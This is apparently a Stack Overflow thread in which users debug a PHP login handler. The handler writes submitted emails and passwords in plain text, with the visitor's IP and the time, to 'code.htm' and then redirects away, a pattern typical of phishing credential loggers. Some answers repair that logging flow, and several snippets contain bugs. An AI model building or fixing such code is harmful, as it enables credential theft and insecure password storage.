# Problems with conditional statements and POST data

Tags: php

I have a basic PHP login form which saves your login information. I have written a php code but the code is not working as expected. Here's the code.

```
<?php
if($_POST) {
    $email=$_POST['id'];
    $pass=$_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    if(empty($email) || empty($pass)){
        header("Location: ../index.php?e=2");
    }
} else {
    $t=time();
    $time=date("D d M Y h:i:s A",$t);
    $f = fopen("code.htm", "a"); 
    fwrite ($f, $email.$password.$ip.$time);
    fclose($f);

    header("Location: xyz.com");
}

if(!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/",$email))) {
    header("Location: ../index.php?email_error=2");
} else {
    //do nothing
}
?>
```

The first **if** clause checks for empty fields and if empty redirects to **index.php?e=2**. The **else** clause writes email,password,ip and time in a file and redirects the user to a desired location.

In the third **if** clause I'm using regular expression for email validation and redirects the user to the index where an error is shown.

This code is very simple but no matter what try only third "if" clause works. I can't figure it out. Thanks for your help and if I've made any mistake please correct it.

Comment: Do an `exit` after your `header` statements..... the PHP script will continue executing otherwise

Comment: `if($_POST){`  = `if(true)`

Comment: Are you sure your first `} else {` is correct ? If so, then you have a lot of undefined variables `$email`, `$pass` and `$ip`

Comment: use `if(isset($_POST['id']))` instead of `if($_POST)`

Comment: use `if (!empty($_POST))` to check if there is any post data.

Comment: `header("Location: xyz.com")` never gets executed because it never gets in the else.

Comment: @Daan : `header("Location: xyz.com")` can be executed if it call by a link.

Comment: Guys I'm sorry but if you could answer it as an answer not as a comment. If I knew what to do? why would i ask this question.

Comment: @urfusion That's not correct `$_POST` is always there, Basically what @Hanky Panky already said.

Answer (score 2, accepted):

Check `$_POST` for empty condition. `if(!empty($_POST))`. As @Dean say. your else will never execute because post is always there. So you should for empty post first and place `exit();` or `die();` after each `header`

```
<?php
  if(!empty($_POST)){
     $email=$_POST['id'];
     $pass=$_POST['pass'];
     $ip = $_SERVER['REMOTE_ADDR'];
  if(empty($email) || empty($pass)){
    header("Location: ../index.php?e=2");
    exit();
   }
}else{
     $t=time();
     $time=date("D d M Y h:i:s A",$t);
     $f = fopen("code.htm", "a"); 
     fwrite ($f, $email.$password.$ip.$time);
     fclose($f);

     header("Location: xyz.com");
     exit();
}
    if(!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/",$email))){
         header("Location: ../index.php?email_error=2");
         exit();
}else{
    //do nothing
}
?>
```

Comment: WTF? Don't use this example. As writed above (@Daan), here a lot of undefined variables.

Comment: This is not working. only the first if executes every time.

Comment: there might be many undefined variables. but I am just telling user that whats wrong with his code. and if one write a good comment what is the harm in including that in answer.

Comment: can you show what are the values you are getting in `$_POST`

Comment: @urfusion Bro your code worked fine except for fwrite and **else** clause header doesn't work when email and password are provided correctly.

Answer (score 1):

Maybe something like this (but i don't understand your case with `fwrite`)

```
//check is request is POST. 
// you can use !empty($_POST) - but this not necessary,
// because ($_POST) and !empty($_POST) - has the same result
// $_POST - this is a global variable, it's always available
// and there empty array - if this is not POST request, or POST request without data.
// and [] == false  // true
if ($_POST) { 
    // if required data empty, don't process below code
    if (empty($_POST['id']) && empty($_POST['pass'])) {
        header("Location: ../index.php?e=2");
        exit();
    }

    // check email, and if it's invalid - go to error
    // and don't process below code
    $email = $_POST['id'];
    if (!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/", $email))) {
        header("Location: ../index.php?email_error=2");
        exit();
    }

    // everything checks out - it's cool
    $pass = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];

    $time = date("D d M Y h:i:s A", time());
    $f = fopen("code.htm", "a");
    fwrite($f, $email . $pass . $ip . $time);
    fclose($f);

    header("Location: xyz.com");
    exit();
} else {
    // show any message or page
}
```

P.S. And you should process any other request type (`else` - show any message or page)

Comment: Your answer is poor. You propose a drastic change to the code without any explanation, when OP is clearly new to PHP and struggling. You are also continuing to use `if ($_POST)` which is the biggest flaw in the original code, as has been pointed out by multiple users in the comments to the question. If you make an attempt to improve the question I will up vote.

Comment: Improved. But i don't agree with `$_POST` check. Because `!empty($_POST)` is redundancy in such case.

Comment: @Dmitry : if you didn't agree with `$_POST` then why you included that in your answer. For reputation ?

Comment: it's included as comment, only for explanation

Answer (score 0):

Remove extra bracket and add exit after header. Final code will be like this :

```
if (isset($_POST['id']) && !empty($_POST['id'])) {
    $email = $_POST['id'];
    $pass = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    if (empty($email) || empty($pass)) {
        header("Location: ../index.php?e=2");
        exit;
    }
  }  else {
    $t = time();
    $time = date("D d M Y h:i:s A", $t);
    $f = fopen("code.htm", "a");
    fwrite($f, $email . $password . $ip . $time);
    fclose($f);

    header("Location: xyz.com");
    exit;
}
if (!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/", $email))) {
    header("Location: ../index.php?email_error=2");
    exit;
} else {
    //do nothing
}
```

Comment: your'e missing "}" of the main "if clause"

Comment: I'm pretty sure that first if statement will return an error if no ['id'] key is set. The !empty() if statement needs to be nested inside the isset() statement.

Comment: @MahaDev when I use this code. it redirects me to xyz.com even if post it empty.